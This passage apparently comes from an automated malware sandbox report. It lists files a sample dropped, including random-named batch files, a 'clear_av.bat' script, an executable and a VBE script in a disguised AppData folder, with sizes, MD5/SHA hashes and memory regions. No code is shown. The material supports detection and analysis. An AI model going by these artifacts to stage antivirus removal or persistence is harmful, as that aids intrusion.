                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        a3ae517f38ae79a6d2fa73fc344ba68b

                                                                                                                                        SHA1

                                                                                                                                        2dfbced5bfc7b87bb13039e49e6b64a8408269d9

                                                                                                                                        SHA256

                                                                                                                                        74ed08dbf8034f799d14c2b004a190f32941f89d783ab0152fc966a357a8eb03

                                                                                                                                        SHA512

                                                                                                                                        940ba818bf6843197ee717415fc5c07b91783bf28b8698f7d83cef288376f49bfcc88b4bb052d7694b0270cc68bb1be6bfec8b2d1a08f0dfa6f6217053f3fd69

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\blOcFVMglb.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        f0ae2666fc43456f88f15513663ce68d

                                                                                                                                        SHA1

                                                                                                                                        753412eee83a6a70d1d503023d0b051a62e92f01

                                                                                                                                        SHA256

                                                                                                                                        98ba103a8ef13c9abb787036e3f939d5fbdda6a7e6e8ef97484db907446f94ff

                                                                                                                                        SHA512

                                                                                                                                        a6a30abea4ab0382aa90ff6eb4a18295142661ce274c26f41c6c16a6ed876e3339e93b9bc65a21a44618333b86d9ccc2dd2a20a5b5e5605f26c77967e2ab299f

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\clear_av.bat

                                                                                                                                        Filesize

                                                                                                                                        5KB

                                                                                                                                        MD5

                                                                                                                                        48d1db006fe2ae378b0f7efd561d7e56

                                                                                                                                        SHA1

                                                                                                                                        63df10216f0ad81d1d42dd2fc8c4483be5d077fc

                                                                                                                                        SHA256

                                                                                                                                        65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a

                                                                                                                                        SHA512

                                                                                                                                        079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        0435f0a3516c1543429468ac78260aa5

                                                                                                                                        SHA1

                                                                                                                                        0c791250982f563724d347aea6b40edd3aaa1070

                                                                                                                                        SHA256

                                                                                                                                        0ebac18fe2b35bf9c7505c49204a16c399cf8b9a5875ccbb9d601252117253af

                                                                                                                                        SHA512

                                                                                                                                        0fc492e72663b94af2267cabd3919ae865e3e1b98a8ab060a3a76e4623abf9070284e59cdded178c4555ea0cea1b485e92402a3a22da2dfb0ddf122c02e27d41

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\guIa2jZB2U.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        02b40fab1f395c3dc558d404b3ef931b

                                                                                                                                        SHA1

                                                                                                                                        7c9ca81c91c7682c65d75d6030c9fbb117c4cf89

                                                                                                                                        SHA256

                                                                                                                                        80f1b050fa0e354f71589db99fd1ecb103b8a26976cdd5ccd83b86858896d32d

                                                                                                                                        SHA512

                                                                                                                                        ac8bb06ec498df876a415d7bf54234618c4f8c6f6489ab6620907aac399fcb544954ac13f2550e4eb2cffce18302d7fac8d398821c1942d85b33fc350c1c420a

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\iQWRCQKxyP.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        b71d3786aee14d515a6f5a7deb4c5fd1

                                                                                                                                        SHA1

                                                                                                                                        3227e8f7dc07aa57f7caa246ae5f289e063aad74

                                                                                                                                        SHA256

                                                                                                                                        c9509ef6f7e57ad296f1c442fd538353b4f6f96d212856504891535f7b889569

                                                                                                                                        SHA512

                                                                                                                                        7a39593090fa20ffdcf288ddb636425e6f4dad0154a5ba55e92f4d3d3f9be45898f80b5a1220dcf051066278329b9108283e2785866cba0a608351191b0964db

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lg1oIatdTn.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        f1390db6b412922820ad36f6f6ceae6f

                                                                                                                                        SHA1

                                                                                                                                        11310a88338f79cf374a9a12251579f8e6daf3b9

                                                                                                                                        SHA256

                                                                                                                                        7ddb6b8d9ea03c8352ffbf81dcae1bfa5ce3e3acbf860f4c229af610e1189605

                                                                                                                                        SHA512

                                                                                                                                        98b734048e74b308422df1f306fbfa2bc0118c94d6481d93ec35e9d0d2a4c48226038dbc35501e38c21fc105ff6442c2795a769a43fc6775ad48b671c07974c2

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\niOj6yjqzp.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        f7d195b72a33e0acb208d55917daf1aa

                                                                                                                                        SHA1

                                                                                                                                        40cfc7f75d250cd10f9cb4c5fcb03d4d80ab55f2

                                                                                                                                        SHA256

                                                                                                                                        40623d8113d02447ce8d7689cc27e918fbc0012fbdb18eb90c0dcc2f147002a1

                                                                                                                                        SHA512

                                                                                                                                        ed1ba77376fabe62992b674c3bc449fce18ab89834d12bfbd47768cfef88402ff2a3457171e31066960b038d7e0bced538fc6069aa56f2485b2ccb9f35590bf4

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        08118e5e801f5c7cdef6c485a0aa71fa

                                                                                                                                        SHA1

                                                                                                                                        5956d7854460eaaf67caed2248ffda9f90e5e6f8

                                                                                                                                        SHA256

                                                                                                                                        5c718a423c0c22888c6a78f88bca9ad5e0ebe3f617c4ba6f068e9f26aa8a95c2

                                                                                                                                        SHA512

                                                                                                                                        129d141a43aabd2bffc244ab14fb708db57718477ac108080cc98849cdcc9f73572b06017c3cedde64b0ad2f302eb1ac3cfcfee5403a29fc4201b77ca1ceb8a9

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wtOcRLEbie.bat

                                                                                                                                        Filesize

                                                                                                                                        199B

                                                                                                                                        MD5

                                                                                                                                        d8f8f8c9c8942de946d54d40f2527d8a

                                                                                                                                        SHA1

                                                                                                                                        12a54720941c0a254287dca70a33acf71ca255d6

                                                                                                                                        SHA256

                                                                                                                                        92c965155ed8622a699507a199d1eaa2eefe6b55a432442f17588564406cb8c4

                                                                                                                                        SHA512

                                                                                                                                        79fef5609b70950a5d4d23b5ec8d94526ef264db28fb394d240f9e5e5747e4436f8e2f8a5064abc374afc8171d0c4a0a286293417d0588d92aa9e72921f87e3f

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat

                                                                                                                                        Filesize

                                                                                                                                        42B

                                                                                                                                        MD5

                                                                                                                                        773bdbbe3e641a349d737adddf1223c0

                                                                                                                                        SHA1

                                                                                                                                        682e313b914460eefe3e2cb7a09beeacd461c108

                                                                                                                                        SHA256

                                                                                                                                        606a9b2fe5108baa4a87284abaa58179f02cb4df332e81bf866351b66a04643a

                                                                                                                                        SHA512

                                                                                                                                        0f2a2ac17804b254d91dee3ebba42df3630ffef674ec72102310ed76c9adaa874abb02d7a674183838da8951428a2d8504f6717279fd725be6002565017154a4

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

                                                                                                                                        Filesize

                                                                                                                                        2.1MB

                                                                                                                                        MD5

                                                                                                                                        1876c5d2f6209c7ca5db2b568ec8dc47

                                                                                                                                        SHA1

                                                                                                                                        6bc2ed6ef3bfff6ac95ddeba230634520ea4fe33

                                                                                                                                        SHA256

                                                                                                                                        e580bbab6157f88c10d75fdbf17ac4d971e60d6e81982da6e78dfb28af58a755

                                                                                                                                        SHA512

                                                                                                                                        b2f2a38154cbf531ab5e47c6e310ca2de4a5365055115af2ee5e08a3d2ac1c21db6b964f0b36c69ffe0164b7dafb2552a9bc6ac6a2846247f58564c9a834cf94

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe

                                                                                                                                        Filesize

                                                                                                                                        205B

                                                                                                                                        MD5

                                                                                                                                        9a1c593488c39a17105a4ea268b40a0e

                                                                                                                                        SHA1

                                                                                                                                        90f73ef3dd6c79442f27f481957e60f0deaa3ab4

                                                                                                                                        SHA256

                                                                                                                                        9158f324d6e13bef490aa65d1a88faf7a86ea8f5672a169a1bebcbe6b84bf7b5

                                                                                                                                        SHA512

                                                                                                                                        a955caffe8bd4b697afadaf18f7bb34fe17c1fc7555708a0bff792c301c9b40ebdc680b0e8c50219ea37b23cf3b154f041ec57c549979d3b8f9546b269cdd67d

                                                                                                                                      • memory/976-150-0x00000000026E0000-0x0000000002736000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        344KB

                                                                                                                                      • memory/4048-86-0x000000001B5F0000-0x000000001B646000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        344KB

                                                                                                                                      • memory/4392-131-0x000000001AE50000-0x000000001AEA6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        344KB

                                                                                                                                      • memory/4756-0-0x00007FFA85573000-0x00007FFA85574000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/4756-1-0x0000000000160000-0x000000000034C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.9MB

                                                                                                                                      • memory/4756-4-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        9.9MB

                                                                                                                                      • memory/4756-19-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        9.9MB

                                                                                                                                      • memory/4944-40-0x000000001BF80000-0x000000001BFD6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        344KB

                                                                                                                                      • memory/4944-36-0x0000000000A80000-0x0000000000CA4000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.1MB

                                                                                                                                      • memory/4944-37-0x000000001B7A0000-0x000000001B7BC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        112KB

                                                                                                                                      • memory/4944-38-0x000000001BF30000-0x000000001BF80000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        320KB

                                                                                                                                      • memory/4944-39-0x000000001B7C0000-0x000000001B7D6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        88KB